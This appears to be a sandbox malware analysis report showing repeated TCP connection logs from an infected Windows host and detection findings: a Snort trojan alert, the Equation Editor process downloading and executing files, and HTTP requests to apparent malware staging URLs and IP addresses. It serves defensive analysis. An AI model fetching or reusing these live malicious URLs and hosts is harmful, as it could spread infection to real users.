Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 41.216.183.13:80 -> 192.168.2.22:49175

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 41.216.183.13 80

Jump to behavior

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 194.163.41.117 194.163.41.117
Source: Joe Sandbox View	IP Address: 23.95.235.16 23.95.235.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NEXINTO-DE NEXINTO-DE
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
